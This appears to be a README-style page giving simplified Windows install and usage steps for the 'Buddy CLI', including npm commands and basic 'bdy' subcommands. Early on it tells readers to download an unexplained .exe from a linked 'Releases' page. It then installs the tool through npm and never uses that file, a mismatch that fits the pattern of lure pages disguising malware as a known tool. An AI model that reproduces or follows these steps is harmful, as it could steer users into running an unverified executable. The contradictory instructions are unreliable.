The Buddy CLI is a tool for your computer. It helps you manage your software projects. You use it to control your work from a text window on your screen. This tool links your projects to your online accounts. You can start, stop, and track your work without opening a web browser. It saves time for people who build software.
- A computer running Windows 10 or Windows 11.
- Node.js version 24 or newer.
- An internet connection to sync your files.
- A free account on the Buddy website.
You must visit the main page to get the installer for your computer. This file contains all the parts needed to run the tool.
Click here to open the download page
Follow these steps to finish the download:
- Open the link above in your web browser.
- Look for the section labeled Releases.
- Click the file that ends with .exe to save it to your computer.
- Wait for the download to finish.
Follow these steps to set up the tool on your system.
The tool needs software called Node.js to function.
- Go to the official Node.js website.
- Select the version marked as Recommended for Most Users.
- Download the installer.
- Run the installer and click Next through the prompts.
- Restart your computer after the install finishes.
- Press the Windows key on your keyboard.
- Type "powershell" and press Enter.
- A blue window will open. Type the following command exactly as it appears:
npm i -g bdy - Press Enter on your keyboard.
- The system will download and set up the tool automatically.
- Once the text stops scrolling, the install is complete.
You can check that the tool works after you install it.
- Open a new PowerShell window.
- Type
bdyand press Enter. - The screen will show a list of commands. This confirms the setup is correct.
You must connect the tool to your Buddy account to use it.
- Type
bdy logininto your PowerShell window. - Press Enter.
- A web browser window will open on your screen.
- Sign in with your username and password.
- Allow the tool to access your profile.
- Close the browser window once the page says "Success."
You can manage your projects by typing simple commands.
Type bdy projects and press Enter. The tool displays every project connected to your account.
Type bdy status to see the current state of your pipeline. This shows if your project passes or fails its performance tests.
Type bdy run [name] where [name] is the task you want to begin. The tool starts the work in the background immediately.
You can find more help in the official documentation. Visit the Buddy documentation website to see advanced options. These guides explain how to trigger complex automations and manage shared files.
No. The tool needs the internet to communicate with the project servers.
The tool uses the name bdy to prevent clashes with other programs. We do not suggest changing this name.
Use the GitHub Issues tab on the repository page. Provide a description of the error and your Windows version.
The tool clears the screen sometimes to show fresh information about your tasks. This is normal behavior and does not mean the system crashed.
Run the command npm i -g bdy@latest to get the latest improvements and fixes for your system. The installer will overwrite the old files with the new ones.